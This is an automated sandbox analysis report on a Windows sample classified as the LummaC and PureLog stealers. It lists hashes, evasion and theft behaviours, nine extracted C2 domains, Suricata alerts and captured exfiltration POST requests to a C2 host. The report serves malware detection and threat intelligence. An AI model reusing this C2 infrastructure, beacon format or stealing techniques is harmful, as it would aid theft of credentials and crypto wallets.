Edit tour

Windows Analysis Report
EZsrFTi.exe

Overview

General Information

Sample name:	EZsrFTi.exe
Analysis ID:	1592068
MD5:	c0a15c8328d0eb6c48c194ca52787560
SHA1:	79c65b0b78d7d28729e3ece99e888ca3acdd47e7
SHA256:	cf6e4051d20e654347161dc77b59840a6270cad5e63b4a59a59148c37e776f99
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

LummaC, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

EZsrFTi.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\EZsrFTi.exe" MD5: C0A15C8328D0EB6C48C194CA52787560)

EZsrFTi.exe (PID: 7684 cmdline: "C:\Users\user\Desktop\EZsrFTi.exe" MD5: C0A15C8328D0EB6C48C194CA52787560)

EZsrFTi.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\EZsrFTi.exe" MD5: C0A15C8328D0EB6C48C194CA52787560)

EZsrFTi.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\EZsrFTi.exe" MD5: C0A15C8328D0EB6C48C194CA52787560)

WerFault.exe (PID: 7824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 940 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["immolatechallen.bond", "sobrattyeu.bond", "jarry-fixxer.bond", "strivehelpeu.bond", "crookedfoshe.bond", "growthselec.bond", "pain-temper.bond", "stripedre-lot.bond", "jarry-deatile.bond"], "Build id": "yau6Na--7329910690"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
EZsrFTi.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1292054697.0000000000622000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: EZsrFTi.exe PID: 7732	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: EZsrFTi.exe PID: 7732	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.EZsrFTi.exe.620000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.EZsrFTi.exe.39e9550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.EZsrFTi.exe.39e9550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T18:11:05.442760+0100	2028371	3	Unknown Traffic	192.168.2.11	49707	104.21.64.1	443	TCP
2025-01-15T18:11:06.693913+0100	2028371	3	Unknown Traffic	192.168.2.11	49708	104.21.64.1	443	TCP
2025-01-15T18:11:08.156911+0100	2028371	3	Unknown Traffic	192.168.2.11	49710	104.21.64.1	443	TCP
2025-01-15T18:11:09.451195+0100	2028371	3	Unknown Traffic	192.168.2.11	49715	104.21.64.1	443	TCP
2025-01-15T18:11:10.735748+0100	2028371	3	Unknown Traffic	192.168.2.11	49727	104.21.64.1	443	TCP
2025-01-15T18:11:12.853049+0100	2028371	3	Unknown Traffic	192.168.2.11	49742	104.21.64.1	443	TCP
2025-01-15T18:11:14.284231+0100	2028371	3	Unknown Traffic	192.168.2.11	49750	104.21.64.1	443	TCP
2025-01-15T18:11:16.693086+0100	2028371	3	Unknown Traffic	192.168.2.11	49769	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T18:11:05.949857+0100	2054653	1	A Network Trojan was detected	192.168.2.11	49707	104.21.64.1	443	TCP
2025-01-15T18:11:07.501941+0100	2054653	1	A Network Trojan was detected	192.168.2.11	49708	104.21.64.1	443	TCP
2025-01-15T18:11:17.494241+0100	2054653	1	A Network Trojan was detected	192.168.2.11	49769	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T18:11:05.949857+0100	2049836	1	A Network Trojan was detected	192.168.2.11	49707	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T18:11:07.501941+0100	2049812	1	A Network Trojan was detected	192.168.2.11	49708	104.21.64.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T18:11:08.917043+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.11	49710	104.21.64.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.EZsrFTi.exe.39e9550.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["immolatechallen.bond", "sobrattyeu.bond", "jarry-fixxer.bond", "strivehelpeu.bond", "crookedfoshe.bond", "growthselec.bond", "pain-temper.bond", "stripedre-lot.bond", "jarry-deatile.bond"], "Build id": "yau6Na--7329910690"}

Multi AV Scanner detection for submitted file

Source: EZsrFTi.exe

Virustotal: Detection: 27%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.6% probability

Machine Learning detection for sample

Source: EZsrFTi.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jarry-fixxer.bond
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: pain-temper.bond
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jarry-deatile.bond
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: growthselec.bond
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: stripedre-lot.bond
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: immolatechallen.bond
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: crookedfoshe.bond
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: strivehelpeu.bond
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: sobrattyeu.bond
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: yau6Na--7329910690

Source: C:\Users\user\Desktop\EZsrFTi.exe

Code function: 4_2_004151D0 CryptUnprotectData,

4_2_004151D0

Source: EZsrFTi.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49769 version: TLS 1.2

Source: EZsrFTi.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.pdb$ source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: mscorlib.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: Handler.pdb@\lqMZ@ source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: Handler.pdbx source: EZsrFTi.exe
Source:	Binary string: Handler.pdb source: EZsrFTi.exe, WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.Windows.Forms.pdb\ source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.Core.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.pdb source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdb source: WERFB06.tmp.dmp.7.dr

Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	4_2_00441230
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov esi, eax	4_2_0043A2B0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	4_2_00441310
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov ecx, eax	4_2_004243A0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+50h]	4_2_004243A0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov edx, ecx	4_2_00409BB0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-0Fh]	4_2_00409BB0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov dword ptr [esp], esi	4_2_00427520
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi-0AFF8E14h]	4_2_004330F0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov word ptr [ecx], bx	4_2_0041C09C
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+159A831Ah]	4_2_0042E8A9
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp dword ptr [esi+edi*8], 6A911B6Ch	4_2_004180AC
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000C1h]	4_2_00440910
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx-2Bh]	4_2_00440910
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+159A831Ah]	4_2_0042E91D
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	4_2_0041812C
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov ebx, eax	4_2_00405930
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov ebp, eax	4_2_00405930
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-597BE901h]	4_2_004249D0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	4_2_0043D9D0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov ecx, edx	4_2_0040A9E0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	4_2_00417193
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000120h]	4_2_00417193
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_0042B240
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov ecx, eax	4_2_0043EA02
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov dword ptr [esi+0Ch], edx	4_2_0040B21B
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp word ptr [edi+esi+02h], 0000h	4_2_0041BACA
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then add ecx, eax	4_2_004272D8
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx-2Bh]	4_2_00440AF0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx ebx, bx	4_2_004262F7
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov ecx, eax	4_2_0041A28A
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	4_2_0040CAB2
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov edi, eax	4_2_00402B70
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then test esi, esi	4_2_0043B300
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx-2Bh]	4_2_00440BA0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax-7F9455FDh]	4_2_0041A3B1
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov eax, FFFFFFFFh	4_2_00414BBB
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0042DC65
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0000012Ch]	4_2_0042EC6B
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+edi]	4_2_0044046D
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 53585096h	4_2_00426C74
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then lea eax, dword ptr [esp+4Ch]	4_2_00426C74
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	4_2_0043ACEA
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	4_2_00407490
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	4_2_00407490
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edi, word ptr [edx]	4_2_00425D67
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp word ptr [edi+esi+02h], 0000h	4_2_0041BDC0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then not eax	4_2_00417DC3
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx ebx, bx	4_2_004262F7
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov byte ptr [ebx], cl	4_2_0042D5AC
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7B8B8D6Fh]	4_2_00429665
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then jmp eax	4_2_0042966F
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0041A60C
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx-2Bh]	4_2_00440ED0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov ecx, eax	4_2_004096B0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	4_2_0042C710
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov byte ptr [esi], al	4_2_0042EF3F
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0041A7F6
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000C1h]	4_2_004407FD
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx-2Bh]	4_2_004407FD
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov edx, ebx	4_2_0043AF80
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx eax, word ptr [ebp+00h]	4_2_0043B789
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	4_2_0041E790
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_0043E7AE
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+54h]	4_2_00420FB0
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_004167BD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49707 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49707 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49708 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49708 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49769 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49710 -> 104.21.64.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: immolatechallen.bond
Source: Malware configuration extractor	URLs: sobrattyeu.bond
Source: Malware configuration extractor	URLs: jarry-fixxer.bond
Source: Malware configuration extractor	URLs: strivehelpeu.bond
Source: Malware configuration extractor	URLs: crookedfoshe.bond
Source: Malware configuration extractor	URLs: growthselec.bond
Source: Malware configuration extractor	URLs: pain-temper.bond
Source: Malware configuration extractor	URLs: stripedre-lot.bond
Source: Malware configuration extractor	URLs: jarry-deatile.bond

Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49710 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49707 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49708 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49715 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49742 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49769 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49750 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BF6DZ3JBI07BD1HUHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12846Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4QHHLDZZVBYITK5MH8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G7J5MQQ4QJR3QLITMQSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20439Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IFG25ELB7RXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1343Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=13F9SI98ZYOYF9V467User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570166Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: sobrattyeu.bond

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: sobrattyeu.bond

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sobrattyeu.bond

Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: EZsrFTi.exe, 00000004.00000002.2540265272.0000000003C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/
Source: EZsrFTi.exe, 00000004.00000002.2539470987.0000000001477000.00000004.00000020.00020000.00000000.sdmp, EZsrFTi.exe, 00000004.00000002.2539601482.000000000149E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/api
Source: EZsrFTi.exe, 00000004.00000002.2539623279.00000000014A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/pi

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
